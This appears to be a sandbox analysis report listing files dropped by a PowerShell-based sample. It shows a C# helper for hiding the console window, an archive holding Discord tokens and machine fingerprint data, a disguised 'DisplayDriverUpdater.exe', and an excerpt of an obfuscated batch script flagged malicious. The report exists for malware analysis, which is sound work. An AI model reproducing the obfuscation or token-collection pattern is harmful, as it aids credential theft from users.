C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjpyqukw.fdl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwv4xwag.gn0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_typ5t1g2.kgd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1u35rir.o45.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v53khmyo.5wl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbrmpc1e.0b4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\c2ejd4wa\CSC99BE4B68E03746B880F950F6606729FB.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1059000734993276
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryOak7YnqqsPN5Dlq5J:+RI+ycuZhNwakSsPNnqX
MD5:	A1938BC41ADF4C7C0E9642D4067581B5
SHA1:	7CE3D8270EB11EF144FB4B22001630CFD4D649A9
SHA-256:	8846A18BDCADE3CB7FAAE1178F8F8561B320E83370C9D44C1226A18B1D01A97F
SHA-512:	982312F7B195D7B64DD02B5BA303917393D0AC85344B413939A1C75FFEA7AB7CD6719392F7CFAB03FE0490B7580FEC63ECDF16B27BEE27C7623D0ACDAE74B948
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.2.e.j.d.4.w.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.2.e.j.d.4.w.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	737
Entropy (8bit):	4.3182992032221605
Encrypted:	false
SSDEEP:	6:gCslFQrS8N6yv+MGiNF82SRaiOM/siNF82SRalhWM/siNF82SRkoSoODG2ScYdpa:gC6FCXSr4e49OcdpfIbMB04tW9awcQKY
MD5:	3D57F8F44297464BAAFA6AEECD3BF4BC
SHA1:	F370B4B9F8DBA01FBCAD979BD663D341F358A509
SHA-256:	415199EEC01052503978381A4F88F4CD970B441FEDCE519905990ED8B629B0F1
SHA-512:	4052DD65CA0A505A36C7C344671AFCADB8F82CC24B0D1D8362F61565F9D37782E00332908444F6A95286DD1785D074762B27C20BE1F361EEC67807FAD052D798
Malicious:	false
Preview:	. using System;. using System.Runtime.InteropServices;. public class ConsoleWindowUtils {. [DllImport("kernel32.dll")]. public static extern IntPtr GetConsoleWindow();. . [DllImport("user32.dll")]. public static extern IntPtr GetParent(IntPtr hWnd);.. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);. . public static IntPtr GetTargetWindow() {. IntPtr consoleWindow = GetConsoleWindow();. IntPtr parentWindow = GetParent(consoleWindow);. . if (parentWindow == IntPtr.Zero) {. return consoleWindow;. }. return parentWindow;. }. }

C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.265737302377397
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fME5oED+zxs7+AEszIcNwi23fME5oA:p37Lvkmb6KwZcWZEJZr9
MD5:	D12AE0C86B8A139F0225C67BCB91F954
SHA1:	1959CBDBEC978C555EC819169714479077DAEB35
SHA-256:	D9878E21CECB36C354324266C811073688BDF06E7FB71F46D59C8B0277CB662A
SHA-512:	54D34BEBDDC2F1E3A748FAA2C47F1E59EA229273C7CFF3BA00FAEE80D6F3EBCDDA9736BB6F059007FDA4542AE67F1497DA3194BD20056EED716247D190566E0C
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.0.cs"

C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.7719489520658103
Encrypted:	false
SSDEEP:	24:etGSOcRG2dwri+bmejf8wetkZfodkatG4yWI+ycuZhNwakSsPNnq:6flP+BL8wRJoddtFx1ulwa38q
MD5:	82BED2D67276F834DF73A78DAE75DFCF
SHA1:	020BE8C40417336E78DBEF2485EDB16778CBC0E2
SHA-256:	252F9F51A6644E9CEB3285C810AA142E059D433E4A81BFC38CF93D40EF790E9B
SHA-512:	246150BC9517ECD76B183FC303C9C56C61875738276A18A9AB55FBA18ED633B5D735905B50205224FC0122D0E5947651D408878FD85DE254237DA75F0130E58C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jo~g...........!................n$... ...@....... ....................................@..................................$..O....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P$......H........ ...............................................................0..........(......(......~....(....,.....(....*..BSJB............v4.0.30319......l...`...#~......T...#Strings.... .......#US.(.......#GUID...8...`...#Blob...........G.........%3................................................................:.3.....................<.3.................................... A............ R............ \.....P ......g.....z ......w.........}.....}.........w.....w...!.w.".).

C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (453), with CRLF, CR line terminators
Category:	modified
Size (bytes):	874
Entropy (8bit):	5.329943969751889
Encrypted:	false
SSDEEP:	12:xKIR37Lvkmb6KwZcWZEJZr4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KgNEv8Kax5DqBVKVrdFAMBJTH
MD5:	70410E589D7B1D6CF8070BCA084EDCB9
SHA1:	ACE3CF2F3C1266D3DEDECCE42C2E1CE3BDCFFCD1
SHA-256:	C58376FCBB6BA4BA31559DDFD5A7CBA67F62DBA5204C30477057E2BBB09F095D
SHA-512:	78D29EAD8420B27F3ACA92434D628CEB1F1BB8F25DFDCAB97E8552D6362ABCBC8DE9C2F7C25AD2EB093221F601A69551B02431A215A84FBDEFF03D39F7F5B225
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\user.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	882
Entropy (8bit):	6.124345225547264
Encrypted:	false
SSDEEP:	12:5jWHlYdDEVYjVwVR4c71fVUCOrOCXGzNjlXNBsvBQth3O9orK5bP5YfdeAoZYs/4:9WHlhVzhZfyCO1+xNB8CvSWMbP5QYrw
MD5:	226715C6378204B987BA09A19CC1B513
SHA1:	669E89A771D08877D4DA7A87A82E875FF51AD067
SHA-256:	5B8AA7E8AAC00997DFD052947E47F67D58FBF497ECD1FD14E0160426B69B0023
SHA-512:	E42C99CFD564DB276E9DBE87F6D732C65029FC683DBA3E51207DDD91369BA432E35AB9455CAB2CAEDFFC0EE5115DE21709438851F51B3224F7A65ECB5B5D3B39
Malicious:	false
Preview:	PK.........CZ................user\games\PK.........CZ................user\SocialMedias\PK..........(Z................user\discord_tokens.txtPK..........(Z...\|f...8... ...user\pc_specifications.jsonu.Oo.0...~...&c).h.i..4FbD...B..@L..4~..U..]zx...>..S..m.....4.....t.l.p-.S...z..B..!.hO...+.L.-+....k.............lB....d.fn.s.4...Nh:.........n....)..$F..w.4k;.d.q.I.^.+H8.........`.v......j{.).....,zZ....Y.G...]..0N+&1S$...u...E.j....j....k;.ft7.yzh._.3a0 .b. .T.Y......b.(...}W.j...w..%....M~..UR..a........3...L...T..!.ON..T...C. .....PK...........CZ..............................user\games\PK...........C*Z..............................user\SocialMedias\PK............(Z..........................c...user\discord_tokens.txtPK............(Z...\|f...8... .................user\pc_specifications.jsonPK..............A.....

C:\Users\user\AppData\Local\Temp\user\pc_specifications.json

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	568
Entropy (8bit):	4.996228523260027
Encrypted:	false
SSDEEP:	12:Lr8GLaFl1R47qv2lf6aAila64OEoXWpLQF4QtHOU:Lr8G2Flw7qeBJF14OEKAK48OU
MD5:	79FF7295077292E9C7B04FF78E01F92B
SHA1:	790D4E06A855C7B1EDA802B04F2A27C58917E5DA
SHA-256:	C275DEBCDEAD98333A4C92CFD116EC6F2CD8CE1FB7E2789E15FC28099C268E94
SHA-512:	1DC8C55CD16B3B0FFB89DF424F17D5A64697B89C4EF81AB3100B13893AF66E9828C3A0238CE49E1766ED69EF6B64E939806B97C52CDF0E986094EBC2D3344945
Malicious:	false
Preview:	{. "UUID": "19882742-CC56-1A59-9779-FB8CBFA1E29D",. "CPU": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz",. "MacAddress": "EC:F4:BB:82:F7:E0",. "Motherboard": {. "Manufacturer": "DHSYSKBGBZ",. "Product": "P7D7B5NDYX",. "SerialNumber": "9709869787660515". },. "GPU": [. {. "Name": "4KBGFKM",. "VideoProcessor": "ABKV6G94G",. "AdapterRAM": 1073741824. }. ],. "WifiProfiles": null,. "Disks": [. {. "Name": "C:",. "FileSystem": "NTFS",. "VolumeName": "",. "FreeSpace": 2879098880,. "Size": 158430209. }. ].}

C:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.110837620966926
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryClRak7YnqqBlWPN5Dlq5J:+RI+ycuZhNIRakSTWPNnqX
MD5:	36B19417F8B01D0975EA8EE2ECFBC1F9
SHA1:	ADEB92925926C05954F05C421B420EA335DB9929
SHA-256:	C43CD3D68709E9FF9C067FBA9F8A02AEB71CE77BCE2B0378D33D27F6B64BB194
SHA-512:	FF45D8293A0D87D90BC93E74B997A7E7D9C692C562CAE68D75AEC58208EC0E43FDD3CF414AD853C016A22137A293FE6571C4413806DD33E8C080560E77F1D07C
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.1.d.l.y.2.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.1.d.l.y.2.3.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	737
Entropy (8bit):	4.3182992032221605
Encrypted:	false
SSDEEP:	6:gCslFQrS8N6yv+MGiNF82SRaiOM/siNF82SRalhWM/siNF82SRkoSoODG2ScYdpa:gC6FCXSr4e49OcdpfIbMB04tW9awcQKY
MD5:	3D57F8F44297464BAAFA6AEECD3BF4BC
SHA1:	F370B4B9F8DBA01FBCAD979BD663D341F358A509
SHA-256:	415199EEC01052503978381A4F88F4CD970B441FEDCE519905990ED8B629B0F1
SHA-512:	4052DD65CA0A505A36C7C344671AFCADB8F82CC24B0D1D8362F61565F9D37782E00332908444F6A95286DD1785D074762B27C20BE1F361EEC67807FAD052D798
Malicious:	false
Preview:	. using System;. using System.Runtime.InteropServices;. public class ConsoleWindowUtils {. [DllImport("kernel32.dll")]. public static extern IntPtr GetConsoleWindow();. . [DllImport("user32.dll")]. public static extern IntPtr GetParent(IntPtr hWnd);.. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);. . public static IntPtr GetTargetWindow() {. IntPtr consoleWindow = GetConsoleWindow();. IntPtr parentWindow = GetParent(consoleWindow);. . if (parentWindow == IntPtr.Zero) {. return consoleWindow;. }. return parentWindow;. }. }

C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.247898712810037
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23f94zzxs7+AEszIcNwi23f94u:p37Lvkmb6KwZl4zWZEJZl4u
MD5:	F867C7542B3C462F9A68A172F94B36D3
SHA1:	D5B8399868AF1F49C4A693A7DB5A67B05A145E01
SHA-256:	FAD6FFB00E0720F3D24764F764F91FA9E81F9F218622D5C86458F36FDF8B4C4A
SHA-512:	19CB28CD9F9568ED30FB616F5912E45A121DA777199DA078ECCDC4495327B4AD17B4BCA37F497694F956773E8B0E0C776D3D43C327BC9E3C0483AEE323558A33
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.0.cs"

C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.778857710140059
Encrypted:	false
SSDEEP:	24:etGSccRG2dwri+bmejftetkZfWdf3atG4yWI+ycuZhNIRakSTWPNnq:65lP+BLtRJWdfKtFx1ulya3Gq
MD5:	58FCE31D76D34AD0EA480ECB581D6B0D
SHA1:	168C14F3EB03CB0A912DDEB6E107715511B0080D
SHA-256:	7E2C56DDC5E62B8ABC7E60063236648F592D04A81324C652F1934BB6B3930A88
SHA-512:	2F20FEC4F2AE632E3D2CFC25D5BF9CAC8F7D78E0957AA056F68E7BB7728FD8636CF23133C3B7E0C3D7902443880BAEBB74DFBC54C37E5ED425D41DF6D445FF09
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`o~g...........!................n$... ...@....... ....................................@..................................$..O....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P$......H........ ...............................................................0..........(......(......~....(....,.....(....*..BSJB............v4.0.30319......l...`...#~......T...#Strings.... .......#US.(.......#GUID...8...`...#Blob...........G.........%3................................................................:.3.....................<.3.................................... A............ R............ \.....P ......g.....z ......w.........}.....}.........w.....w...!.w.".).

C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (460), with CRLF, CR line terminators
Category:	modified
Size (bytes):	881
Entropy (8bit):	5.3277329395340205
Encrypted:	false
SSDEEP:	24:KwId3ka6Kgl4AEvl4PKax5DqBVKVrdFAMBJTH:xkka67CAEvCPK2DcVKdBJj
MD5:	979C0879B3EA5F78E7F66EE142E0A345
SHA1:	7ECC404D255FD68B0C8A45FD973D5882138024FF
SHA-256:	630AAA8A91C1D5EF187E1EA708F3E4701DA98C8019097E493CC768393FE048C7
SHA-512:	8BFBE2D51236442116AB1A845209F6A600D2E8D8EA6F29397F18B30FD2D66B4A714A5A5B97A1F3F7385542AD572E117D6605B61265A2654C9BCCCCA147AC6FEA
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	452608
Entropy (8bit):	5.459268466661775
Encrypted:	false
SSDEEP:	6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
MD5:	04029E121A0CFA5991749937DD22A1D9
SHA1:	F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
SHA-256:	9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
SHA-512:	6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Uni.exe, Detection: malicious, Browse Filename: SplpM1fFkV.exe, Detection: malicious, Browse Filename: rPO767575.cmd, Detection: malicious, Browse Filename: Social_Security_Statement_Review.vbs, Detection: malicious, Browse Filename: Pollosappnuevo.bat, Detection: malicious, Browse Filename: PollosAplicaccion.bat, Detection: malicious, Browse Filename: gcapi64.cmd, Detection: malicious, Browse Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\runtime.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (5303), with CRLF line terminators
Category:	dropped
Size (bytes):	106527
Entropy (8bit):	5.522460648930725
Encrypted:	false
SSDEEP:	3072:ChdpUYIG45RyUJI0WCjOU0ALMHL/2UFfK5yu32ew:Ch8f5EUJACiVAQC6f23M
MD5:	8158350247E35657CBCCF5054D8A6D33
SHA1:	B2CBD3A164A21D168B281A43646A08F4717539AF
SHA-256:	8D4934D75E3A578B2E836507AE1FD02FA67E33C79F5A784C2EAD91FECC2FB8F0
SHA-512:	F772A497BAAF2F73B4FA2565ABC7E536CE1D505C51271646532662D89F1EE34AD593FFAEBC99D67F343E4973268EFEA7B8BF6CD9F274C4266278FC0E71B04AFF
Malicious:	true
Preview:	%gtIWDnnNi%@%hLapwtl%%KJnbLRXv%e%ZxjvmEP%%tgQDwaZ%c%bMUamOzff%%VOVxDnO%h%wnsQvISdK%%CrCjGVQdB%o%CzXSTDka% %dBqJgnkC%o%eWjtsiRUH%%ONsJIhWY%f%FzQjZAND%%rDJdjqx%f%vqcZuCo% ....%LFqWmRJEl%e%cCJNurunk%%DPTvTiacY%c%ggpxDfx%%ejOZyauT%h%zPUCliV%%oMDPODS%o%MfuKXJW% %rYFqRegyV%@%kiFCOGq%%vxWowrl%e%kmBuWyZE%%VDAohdurG%c%MOckgtSlZ%%sODAXvBRs%h%cGWSszAC%%ycfUTPL%o%wovsuFmUW% %KwtrXrgfg%o%gdRInSzeK%%SmgIBIT%f%lIxJVpS%%mhiXQoVM%f%hsjEZjXjI% %lIXOITu%>%wHfAFWmIm%%sYmarlEuC%>%VwdjmPAdh% %JsTZZlM%k%eKcwKLu%%SFKbIzO%d%RbSzAjaDy%%UTndTvIP%o%OohBrWTX%%DCKtwREP%t%uGXtLbny%%QrhzjmTla%F%uDuwyaXk%%atlRlEnb%y%FPFHKWTjb%%oiEXCsy%o%kGuEocTS%%ABGSiTP%o%incSHgQW%%slkLSdFi%c%gyKjafd%%yCJCTlvPZ%.%hOvYboDau%%KIkAhPAU%b%mEXnscEGQ%%XMaMCNxrg%a%LvPIVAQ%%MWkjUDEf%t%kPkJGreX% %IVXggZnx%&%CygRqMga%%JrGrNKFfz%&%xEaEFEsQ% %bfOnfVFM%e%aiIvRppre%%vrztoPc%c%ZdfLSvvc%%gXHlqbcRp%h%UiFDYxp%%cWWFrayRp%o%RqhIdLeO% %OGMvdTe%f%ujTRdDqe%%DXpyjRW%i%tafLxxqk%%xQLoUkze%n%UKoeZjLj%%erHZzVq%d%VtgBOhR%%atpoVMJiw%s%OLagNwgqk%%rFsnHgEJ%t%lOIKBo

C:\Users\user\Desktop\kdotFyooc.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.798349911505914
Encrypted:	false
SSDEEP:	3:mKDDgvJxwuMW0nacwREaKC5ALsLHETFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg9e:hO/wu9cNwiaZ5ALszETgvt2hQI1iAMLA
MD5:	C741B312CAEA7173193DD8CD7FA2B7FA
SHA1:	4B23AA4778CEB01ACBC6EB39104D26C04BD103FD
SHA-256:	CFB63A6054E5D34C5A56F6AECC0A8B7316141EB6282CAB16D368FC0E0AFE13E0
